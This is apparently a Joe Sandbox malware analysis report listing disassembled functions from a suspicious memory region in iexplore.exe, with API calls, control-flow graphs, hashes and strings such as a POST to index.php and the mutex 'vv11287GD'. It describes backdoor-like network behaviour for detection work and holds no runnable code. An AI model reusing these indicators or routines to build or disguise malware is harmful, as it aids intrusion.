260 4b499eb 256->260 257->256 263 4b49a06-4b49a0c 259->263 264 4b499fa 259->264 260->259 266 4b49a14-4b49a33 call 4b4211c call 4b4250c 263->266 267 4b49a0e RevertToSelf 263->267 264->263 266->217 267->266 280 4b49c27-4b49c46 277->280 279 4b49b5d-4b49b62 278->279 279->279 281 4b49b64-4b49b7b call 4b46275 279->281 280->252 285 4b49c4c-4b49c59 280->285 286 4b49b81 281->286 287 4b49b7d-4b49b7f 281->287 288 4b49c62 285->288 289 4b49c5b-4b49c60 285->289 290 4b49b83-4b49bdd call 4b4810d * 3 call 4b4211c call 4b58d83 call 4b42b51 286->290 287->290 291 4b49c64-4b49c71 288->291 289->291 325 4b49be5-4b49c13 lstrcpyW call 4b4211c lstrcatW 290->325 326 4b49bdf 290->326 292 4b49c73 291->292 293 4b49c79-4b49c9a 291->293 292->293 293->254 298 4b49ca0-4b49ca3 293->298 300 4b49ca5-4b49cac 298->300 301 4b49cca-4b49cde 298->301 300->301 303 4b49cae-4b49cba 300->303 304 4b49ce0-4b49cea 301->304 305 4b49d0c-4b49d1e call 4b46f3e 301->305 303->301 308 4b49cec 304->308 309 4b49cee-4b49cfe 304->309 314 4b49d20-4b49d23 call 4b487af 305->314 315 4b49d28-4b49d3e call 4b488d8 call 4b46e0e call 4b4697b 305->315 308->309 309->305 320 4b49d00-4b49d06 GetLastError 309->320 314->315 331 4b49d43-4b49d52 315->331 320->305 325->280 326->325 331->257 332 4b49d58-4b49d60 331->332 333 4b49d66-4b49d69 332->333 334 4b49ed7-4b49ede 332->334 337 4b49dba-4b49e00 call 4b59380 * 2 call 4b46193 333->337 338 4b49d6b-4b49db5 333->338 335 4b49ee0-4b49ef5 call 4b46935 334->335 336 4b49f02-4b49f08 334->336 346 4b49ef7-4b49efd 335->346 347 4b49f4b-4b49f53 335->347 343 4b49f0f-4b49f11 336->343 364 4b49e04-4b49e36 call 4b4c31f call 4b43ff1 337->364 365 4b49e02 337->365 338->334 348 4b49f13-4b49f1d 343->348 349 4b49f1f-4b49f45 call 4b46935 343->349 346->331 351 4b49f55-4b49f69 347->351 352 4b49f80-4b49f8a 347->352 348->347 349->331 349->347 358 4b49f70-4b49f72 351->358 362 4b49fc0-4b49fcc GetLastError 352->362 363 4b49f8c-4b49f9e call 4b49603 call 4b46886 352->363 358->352 361 4b49f74-4b49f7a GetLastError 358->361 361->352 362->331 363->331 375 4b49fa4-4b49fae call 4b469b4 363->375 374 4b49e39-4b49e3e 364->374 365->364 374->374 376 4b49e40-4b49e4a 374->376 375->257 380 4b49fb4-4b49fbb call 4b485b4 375->380 378 4b49e4d-4b49e52 376->378 378->378 381 4b49e54-4b49e77 call 4b46275 378->381 380->256 386 4b49e7d 381->386 387 4b49e79-4b49e7b 381->387 388 4b49e7f-4b49e9f call 4b46275 386->388 387->388 391 4b49ea1 388->391 392 4b49ea3-4b49ed1 call 4b4211c * 2 388->392 391->392 392->334
      APIs
      • GetLastError.KERNEL32(?,?,00000000), ref: 04B499C1
      • RevertToSelf.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04B49A0E
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: ErrorLastRevertSelf
      • String ID: <$POST$index.php
      • API String ID: 3253228863-4060378329
      • Opcode ID: a574be9b3d2e2dfe01c2986f4d163e1b746428da324ff3577357bf1b11026ab0
      • Instruction ID: ca6083e7db5c9bd9cdfdf87649b619e72eaf4b8a185d1fa6c3efc17ba27fca7a
      • Opcode Fuzzy Hash: a574be9b3d2e2dfe01c2986f4d163e1b746428da324ff3577357bf1b11026ab0
      • Instruction Fuzzy Hash: AE1253B1500258AFEB249F74CD84BEBB7B9EB85704F0048EAE54AA7150DB747E84DF21
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B43909 Relevance: 10.6, APIs: 7, Instructions: 89networkCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 398 4b43909-4b43922 399 4b43924-4b43926 398->399 400 4b4392b-4b43980 htons ioctlsocket connect 398->400 401 4b43a38-4b43a44 call 4b58e89 399->401 402 4b43986-4b43991 WSAGetLastError 400->402 403 4b43a1d-4b43a37 ioctlsocket 400->403 402->403 404 4b43997-4b439d4 select 402->404 403->401 404->403 406 4b439d6-4b43a09 getsockopt 404->406 406->403 408 4b43a0b-4b43a11 406->408 408->403 409 4b43a13 408->409 409->403
      APIs
      • htons.WS2_32(?), ref: 04B4393D
      • ioctlsocket.WS2_32(?,8004667E,?), ref: 04B43966
      • connect.WS2_32(?,?,00000010), ref: 04B43977
      • WSAGetLastError.WS2_32(?,?,00000010,?,8004667E,?), ref: 04B43986
      • select.WS2_32(?,00000000,?,00000000,?), ref: 04B439CC
      • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,?), ref: 04B43A01
      • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 04B43A2E
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: ioctlsocket$ErrorLastconnectgetsockopthtonsselect
      • String ID:
      • API String ID: 2491164242-0
      • Opcode ID: bdbe215ee9f7e0832992d1e07193028deaca0fe55238c05a4b043cb42e0884f9
      • Instruction ID: a4f13bb8ee5a3d686c34ac3c4446b1687e73e59e2b16e2a300635da873c5d90c
      • Opcode Fuzzy Hash: bdbe215ee9f7e0832992d1e07193028deaca0fe55238c05a4b043cb42e0884f9
      • Instruction Fuzzy Hash: 7B311B7191011CAFEB20DF64CC45BEDB7F8EF48315F1046AAE588E2280D7745E959FA1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B5758B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73sleepCOMMON
      Download Yara Rule

      Control-flow Graph

      APIs
      • Sleep.KERNELBASE(00001388), ref: 04B575CA
      • setsockopt.WS2_32(00000000,0000FFFF,00001005,?,00000004), ref: 04B57618
      • setsockopt.WS2_32(00000000,0000FFFF,00001006,00004E20,00000004), ref: 04B5762E
      • setsockopt.WS2_32(00000000,00000006,00000001,?,00000001), ref: 04B57646
        • Part of subcall function 04B43AE9: shutdown.WS2_32(00000000,00000002), ref: 04B43AFC
        • Part of subcall function 04B43AE9: closesocket.WS2_32(?), ref: 04B43B04
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: setsockopt$Sleepclosesocketshutdown
      • String ID: N
      • API String ID: 4173770719-1161386698
      • Opcode ID: eb1ae805b0b96d2537f7c22d53746305aa9c000266659a6e27a92b82c460060c
      • Instruction ID: a2238251ad6dccc88cced9fd6eb9cc7762e0bdebc416d4270865bd5b3ae14533
      • Opcode Fuzzy Hash: eb1ae805b0b96d2537f7c22d53746305aa9c000266659a6e27a92b82c460060c
      • Instruction Fuzzy Hash: 761196B1B4030476FB10A6A59C85FBEBBADDB84314F080096FE01E71D0DEB9A9059771
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B5199B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71synchronizationCOMMON
      Download Yara Rule

      Control-flow Graph

      APIs
      • CreateMutexW.KERNELBASE(00000000,00000000,vv11287GD), ref: 04B519C6
      • GetLastError.KERNEL32 ref: 04B519CC
        • Part of subcall function 04B4D673: GetTickCount.KERNEL32 ref: 04B4D6B8
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: CountCreateErrorLastMutexTick
      • String ID: vv11287GD
      • API String ID: 2324081774-3480148222
      • Opcode ID: 782e150fac59931ccc3012469fdb6651b4f41bae6241f6faa1f32f8549aedb09
      • Instruction ID: b4ab46df8a7d18e618562f069a554221e810498e7cceb5a48230ddf76db3357f
      • Opcode Fuzzy Hash: 782e150fac59931ccc3012469fdb6651b4f41bae6241f6faa1f32f8549aedb09
      • Instruction Fuzzy Hash: E621D570E0121496FB10BFB9CC05BAE76B9EF55708F0005A5DD02E7190EA78B901D765
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B5B8F7 Relevance: 4.5, APIs: 3, Instructions: 34threadCOMMON
      Download Yara Rule

      Control-flow Graph

      APIs
        • Part of subcall function 04B5EAE9: TlsGetValue.KERNEL32(?,04B5EC42,?,04B42E4E,00000000,?,04B4C99A,?,?,?,04B4CE5E,00000000), ref: 04B5EAF2
        • Part of subcall function 04B5EAE9: RtlDecodePointer.NTDLL ref: 04B5EB04
        • Part of subcall function 04B5EAE9: TlsSetValue.KERNEL32(00000000,?,04B42E4E,00000000,?,04B4C99A,?,?,?,04B4CE5E,00000000), ref: 04B5EB13
        • Part of subcall function 04B5EAC9: TlsGetValue.KERNEL32(?,?,04B5B90D,00000000), ref: 04B5EAD7
        • Part of subcall function 04B5EB1D: RtlDecodePointer.NTDLL(?), ref: 04B5EB2E
      • GetLastError.KERNEL32(00000000,?,00000000), ref: 04B5B924
      • RtlExitUserThread.NTDLL(00000000), ref: 04B5B92B
      • GetCurrentThreadId.KERNEL32 ref: 04B5B931
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: Value$DecodePointerThread$CurrentErrorExitLastUser
      • String ID:
      • API String ID: 1656690970-0
      • Opcode ID: a544c02e5879c21b2852743e952181752ff3dc00b089ce911b919315fffaa832
      • Instruction ID: 5b75d0eda32da382fa27153b3e0f155bd03a53095f4a74ea47773b7e10048a56
      • Opcode Fuzzy Hash: a544c02e5879c21b2852743e952181752ff3dc00b089ce911b919315fffaa832
      • Instruction Fuzzy Hash: F5F09670104605ABE704BFB5C548A5EFBA9EF4820871085D4FD49D7232DB34FA438BA0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B5B8EB Relevance: 4.5, APIs: 3, Instructions: 29threadCOMMON
      Download Yara Rule

      Control-flow Graph

      APIs
        • Part of subcall function 04B5EAE9: TlsGetValue.KERNEL32(?,04B5EC42,?,04B42E4E,00000000,?,04B4C99A,?,?,?,04B4CE5E,00000000), ref: 04B5EAF2
        • Part of subcall function 04B5EAE9: RtlDecodePointer.NTDLL ref: 04B5EB04
        • Part of subcall function 04B5EAE9: TlsSetValue.KERNEL32(00000000,?,04B42E4E,00000000,?,04B4C99A,?,?,?,04B4CE5E,00000000), ref: 04B5EB13
        • Part of subcall function 04B5EAC9: TlsGetValue.KERNEL32(?,?,04B5B90D,00000000), ref: 04B5EAD7
        • Part of subcall function 04B5EB1D: RtlDecodePointer.NTDLL(?), ref: 04B5EB2E
      • GetLastError.KERNEL32(00000000,?,00000000), ref: 04B5B924
      • RtlExitUserThread.NTDLL(00000000), ref: 04B5B92B
      • GetCurrentThreadId.KERNEL32 ref: 04B5B931
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: Value$DecodePointerThread$CurrentErrorExitLastUser
      • String ID:
      • API String ID: 1656690970-0
      • Opcode ID: 4b0205b279c9025a92bcd4cb5345513087d6cb7f084dc86069e1a557eb88db48
      • Instruction ID: 890c1370535747e229aa53fab6e700a7968d37bae672ac5589ca08ed078de6f7
      • Opcode Fuzzy Hash: 4b0205b279c9025a92bcd4cb5345513087d6cb7f084dc86069e1a557eb88db48
      • Instruction Fuzzy Hash: A0E06D7180460A67EF003FF5D808B9FFA68EE04248B1404D0FE52E3631EB28FA0286B1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B46BB0 Relevance: 3.9, APIs: 3, Instructions: 164COMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 776 4b46bb0-4b46bf2 call 4b592af 779 4b46e06 776->779 780 4b46bf8-4b46bfe 776->780 781 4b46e08-4b46e0d call 4b5931e 779->781 780->779 782 4b46c04-4b46c45 call 4b59380 * 3 780->782 792 4b46c64-4b46c6b 782->792 793 4b46c47-4b46c4f 782->793 794 4b46c6d-4b46c74 792->794 795 4b46ceb-4b46cf3 792->795 796 4b46c57-4b46c59 793->796 794->795 799 4b46c76-4b46c7d call 4b4b841 794->799 797 4b46cf5-4b46d2b 795->797 798 4b46d5e-4b46d66 795->798 796->792 802 4b46c5b-4b46c5e 796->802 803 4b46d2d 797->803 804 4b46d2f-4b46d43 797->804 800 4b46dc5-4b46dcc 798->800 801 4b46d68-4b46d96 call 4b5a276 798->801 813 4b46d45-4b46d49 799->813 814 4b46c83-4b46cbe call 4b59380 call 4b4f240 799->814 807 4b46e01-4b46e04 800->807 808 4b46dce-4b46dd6 800->808 816 4b46db4-4b46dbb 801->816 820 4b46d98-4b46dae call 4b5a276 801->820 802->792 803->804 804->813 804->816 807->781 810 4b46ddf-4b46de7 808->810 811 4b46dd8-4b46dd9 GlobalFree 808->811 818 4b46df0-4b46df8 810->818 819 4b46de9-4b46dea GlobalFree 810->819 811->810 813->800 827 4b46cc0-4b46cc1 814->827 828 4b46cdf-4b46ce1 814->828 816->800 818->807 822 4b46dfa-4b46dfb GlobalFree 818->822 819->818 820->816 822->807 829 4b46cd5-4b46cdd 827->829 830 4b46cc3-4b46cd0 call 4b58e3d 827->830 831 4b46ce7 828->831 829->831 830->829 831->795
      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: FreeGlobal
      • String ID:
      • API String ID: 2979337801-0
      • Opcode ID: d3758c2d438080c64112dcbfde761eecfa8a57c19346057e046d23f132202204
      • Instruction ID: 338812ca9a864de2204b0eee776b73f5a60fe166078dc694f97c3fa26fb8e1a5
      • Opcode Fuzzy Hash: d3758c2d438080c64112dcbfde761eecfa8a57c19346057e046d23f132202204
      • Instruction Fuzzy Hash: 6A613B71900B05EFEB20DF74C848BEBB7E4FB85304F00496DE96A96290D775BA44DB61
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B486A1 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76COMMON
      Download Yara Rule

      Control-flow Graph

      APIs
      • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000001), ref: 04B486E1
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: FolderPathSpecial
      • String ID: config\systemprofile
      • API String ID: 994120019-3661184424
      • Opcode ID: 84445c4683ea33e60523340542a0a36597b32d280234cce67c3ade823d012c2f
      • Instruction ID: 74d2eb05e456d7f342bac0c888074486bbd08800bf5cab109b5ba725d55f5867
      • Opcode Fuzzy Hash: 84445c4683ea33e60523340542a0a36597b32d280234cce67c3ade823d012c2f
      • Instruction Fuzzy Hash: 1D218171901228AADF20FFA5DC49BEEB7B8EF59714F0001D5E509A2190EB70AB85DF51
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B5B95C Relevance: 3.1, APIs: 2, Instructions: 63threadCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 858 4b5b95c-4b5b96a 859 4b5b980-4b5b998 call 4b5eae9 call 4b5c6e9 858->859 860 4b5b96c-4b5b97e call 4b5c817 call 4b6071f 858->860 870 4b5b9e3-4b5b9ec call 4b58d83 859->870 871 4b5b99a-4b5b9bc call 4b5eca4 call 4b5eb77 859->871 869 4b5b9f8-4b5b9fb 860->869 876 4b5b9f5 870->876 877 4b5b9ee-4b5b9f4 call 4b5c83d 870->877 883 4b5b9c1-4b5b9d9 CreateThread 871->883 884 4b5b9be 871->884 880 4b5b9f7 876->880 877->876 880->869 883->880 885 4b5b9db-4b5b9e1 GetLastError 883->885 884->883 885->870
      APIs
      • CreateThread.KERNELBASE(?,?,04B5B8F7,00000000,?,?), ref: 04B5B9D1
      • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 04B5B9DB
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: CreateErrorLastThread
      • String ID:
      • API String ID: 1689873465-0
      • Opcode ID: ac4a25aa64c3d824226ff1f99899227721bfc04d5bb1a02e2fdda1c0e375fa58
      • Instruction ID: 3551cbeb0d4a4905575b6ca186e1878c62cabb25e607f0cb31128fddd2d0e8a0
      • Opcode Fuzzy Hash: ac4a25aa64c3d824226ff1f99899227721bfc04d5bb1a02e2fdda1c0e375fa58
      • Instruction Fuzzy Hash: C51129321087466FBB11AFA5DC40FABB7A8EF04778B1001A9FC1487571DB31F81186A0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B4F86B Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46sleepCOMMON
      Download Yara Rule

      Control-flow Graph

      APIs
        • Part of subcall function 04B593FA: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 04B5943F
      • Sleep.KERNEL32 ref: 04B4F8D8
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: AllocateHeapSleep
      • String ID: POST
      • API String ID: 4201116106-1814004025
      • Opcode ID: 3d1965d57f9c049a7e6074f1de92bf5bfeabd805dfe8baab277106af563af179
      • Instruction ID: aaa84ad12012df9b240c054a1ef2a9e0e8179793de3ddf420c88ce91d5c756f1
      • Opcode Fuzzy Hash: 3d1965d57f9c049a7e6074f1de92bf5bfeabd805dfe8baab277106af563af179
      • Instruction Fuzzy Hash: 2E01A779600305EBEB10AFA8DC80A6B7BA9EF853287044869FD5547311DE75FC10EB60
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B51AF8 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 33COMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 904 4b51af8-4b51b22 CoInitialize 906 4b51b25 904->906 907 4b51b24 904->907 908 4b51b2b-4b51b2d 906->908 907->906 909 4b51b2f-4b51b35 call 4b51acc 908->909 910 4b51b3a-4b51b49 call 4b58e89 908->910 909->910
      APIs
      • CoInitialize.OLE32(00000000), ref: 04B51B10
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: Initialize
      • String ID: ^As
      • API String ID: 2538663250-2235299175
      • Opcode ID: 717f8f8dca54a1ea160994b5ce9aa11aed461e2dd69232961f4cda8750b462cb
      • Instruction ID: 7866e7ac9fda5a8d1192819cec9e4f6d2ca1620122b5a88594a82d78851f360f
      • Opcode Fuzzy Hash: 717f8f8dca54a1ea160994b5ce9aa11aed461e2dd69232961f4cda8750b462cb
      • Instruction Fuzzy Hash: C4F03775B00109AF9B01EF7DD944AAFB7BDEB84615715049AEC05D3240DB34AE068B75
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B51943 Relevance: 3.0, APIs: 2, Instructions: 28networkCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 914 4b51943-4b5196a WSAStartup 915 4b5198d 914->915 916 4b5196c-4b51973 914->916 919 4b5198f-4b5199a call 4b58e89 915->919 917 4b51975-4b51980 916->917 918 4b51987 WSACleanup 916->918 917->918 920 4b51982-4b51985 917->920 918->915 920->919
      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: CleanupStartup
      • String ID:
      • API String ID: 915672949-0
      • Opcode ID: c5414d2b67bbcfc2d3d7f8b5f5fa352565b1623e984883c27abec891423ec1e6
      • Instruction ID: 1fc8fb45d8e74130a4fb9bb5e3623f6e69b600df1cf563bedaf185138bf4b2a4
      • Opcode Fuzzy Hash: c5414d2b67bbcfc2d3d7f8b5f5fa352565b1623e984883c27abec891423ec1e6
      • Instruction Fuzzy Hash: 98F03070E10148ABEF60EF7C9919BA9F7F8DB19304F4004E6994AD6155E534A9478E21
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B51A94 Relevance: 3.0, APIs: 2, Instructions: 27synchronizationCOMMON
      Download Yara Rule
      APIs
      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,04B5BE64,?,?,?,?,?,?,04B76C78,0000000C,04B5BF0C), ref: 04B51A9D
      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 04B51ABE
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: CreateEventObjectSingleWait
      • String ID:
      • API String ID: 2678385144-0
      • Opcode ID: 35137fb1e2a7aff2af816c1479c01722084d12008606dbeb29deef6c48d4ce14
      • Instruction ID: 93ba1d6b9dfb3ff5dfa0337c6ee57c25c0e58d0d571d887fa96161573419dedb
      • Opcode Fuzzy Hash: 35137fb1e2a7aff2af816c1479c01722084d12008606dbeb29deef6c48d4ce14
      • Instruction Fuzzy Hash: 39E0123291B13176D630567B1C4DFDB5D9CCF576F07050655F81DD11D1D5545812C5F0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B43AE9 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
      Download Yara Rule
      APIs
      • shutdown.WS2_32(00000000,00000002), ref: 04B43AFC
      • closesocket.WS2_32(?), ref: 04B43B04
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: closesocketshutdown
      • String ID:
      • API String ID: 572888783-0
      • Opcode ID: b50f504f29824ecf5d347c8d5effcd8aaa0c375f6adc5d06d37c855767441082
      • Instruction ID: 2eb3d7eb4e7e0f451a031da8d2570c6325eab7324ccfe74955eb377f3f14824b
      • Opcode Fuzzy Hash: b50f504f29824ecf5d347c8d5effcd8aaa0c375f6adc5d06d37c855767441082
      • Instruction Fuzzy Hash: 3FD01C30200210ABE7240B2CA84AB807AE4EB00730F294B9AE0F1A22E0C7749881CA60
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B593FA Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMONLIBRARYCODE
      Download Yara Rule
      APIs
      • RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 04B5943F
        • Part of subcall function 04B5F19C: GetModuleFileNameW.KERNEL32(00000000,04B9D222,00000104,00000001,00000000,00000000), ref: 04B5F238
        • Part of subcall function 04B5B5E6: ExitProcess.KERNEL32 ref: 04B5B5F7
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: AllocateExitFileHeapModuleNameProcess
      • String ID:
      • API String ID: 1715456479-0
      • Opcode ID: fdfc14c4d668d62d54afa6d8f8228686440c9709866ed924660886e48608d666
      • Instruction ID: e9c08e2084f956f679686fe47279315408086037cddc2bf93d32c38874aaf0e7
      • Opcode Fuzzy Hash: fdfc14c4d668d62d54afa6d8f8228686440c9709866ed924660886e48608d666
      • Instruction Fuzzy Hash: E101D8B1204742DAF7713B3DEC40B36FAADEB81268F5041B6EC058A1B0DEB4BC418270
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B43A98 Relevance: 1.5, APIs: 1, Instructions: 40networkCOMMON
      Download Yara Rule
      APIs
      • send.WS2_32(?,?,?,00000000), ref: 04B43AD2
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: send
      • String ID:
      • API String ID: 2809346765-0
      • Opcode ID: 3b605217ca0376cfb8e2dff32c2e52fa591f0f6a68092000d73b8083cd176a88
      • Instruction ID: 5811fccc8c0243268df2e553da03158652b82b695994e47b6eccc1625bd4ac6b
      • Opcode Fuzzy Hash: 3b605217ca0376cfb8e2dff32c2e52fa591f0f6a68092000d73b8083cd176a88
      • Instruction Fuzzy Hash: 12F090323841147FDB008969DC81EAE3BDDEBC96B0F28426AF914CA1C0E2B1A941A760
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B438D3 Relevance: 1.5, APIs: 1, Instructions: 24networkCOMMON
      Download Yara Rule
      APIs
      • socket.WS2_32(00000002,00000002,00000011), ref: 04B438F4
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: socket
      • String ID:
      • API String ID: 98920635-0
      • Opcode ID: 42dc3353e985cc5e5898b6e5d5a220500866a37bb1dcdeddaee338a85ee94cca
      • Instruction ID: f459a5fc3e6397a56e26c7cda85ecb62c1a19db4ecb42c3b024cece2523e7d1d
      • Opcode Fuzzy Hash: 42dc3353e985cc5e5898b6e5d5a220500866a37bb1dcdeddaee338a85ee94cca
      • Instruction Fuzzy Hash: 1AE04F31350326BBD3305D688C0BB91B6D49B45B71F28977AAAA2951C1E2B158D1A650
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B458CC Relevance: 1.5, APIs: 1, Instructions: 24threadCOMMON
      Download Yara Rule
      APIs
      • CreateThread.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 04B458EB
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: CreateThread
      • String ID:
      • API String ID: 2422867632-0
      • Opcode ID: bbf0a39991566964e973179c39b9cc047d6015feb27405042717c3122f9aa73f
      • Instruction ID: fe0570b3a3922b7697dc049c086581efa0fc624aa9db7300755501bd2c7dc037
      • Opcode Fuzzy Hash: bbf0a39991566964e973179c39b9cc047d6015feb27405042717c3122f9aa73f
      • Instruction Fuzzy Hash: 0AE08632204305BFE7644E68DC01B9677DCEB08761F10442AB685C5190EAB1A450EB60
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B5E948 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
      Download Yara Rule
      APIs
      • HeapCreate.KERNELBASE(00000000,00001000,00000000,04B5BCAD,04B76C58,00000008,04B5BE51,?,?,?,04B76C78,0000000C,04B5BF0C,?), ref: 04B5E951
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: CreateHeap
      • String ID:
      • API String ID: 10892065-0
      • Opcode ID: bdb15791b3c192eef97cacfa72fbf94c8c08123de8c564d15c398c2f11f47fca
      • Instruction ID: 66030004052949b07954810121d26e1317b15bd5fd605962985701018e7f79bf
      • Opcode Fuzzy Hash: bdb15791b3c192eef97cacfa72fbf94c8c08123de8c564d15c398c2f11f47fca
      • Instruction Fuzzy Hash: E7C09BB434574357EB544B395D167552594970C752F50402B7307DA5D0DBF46C505A34
      Uniqueness

      Uniqueness Score: -1.00%

      Non-executed Functions

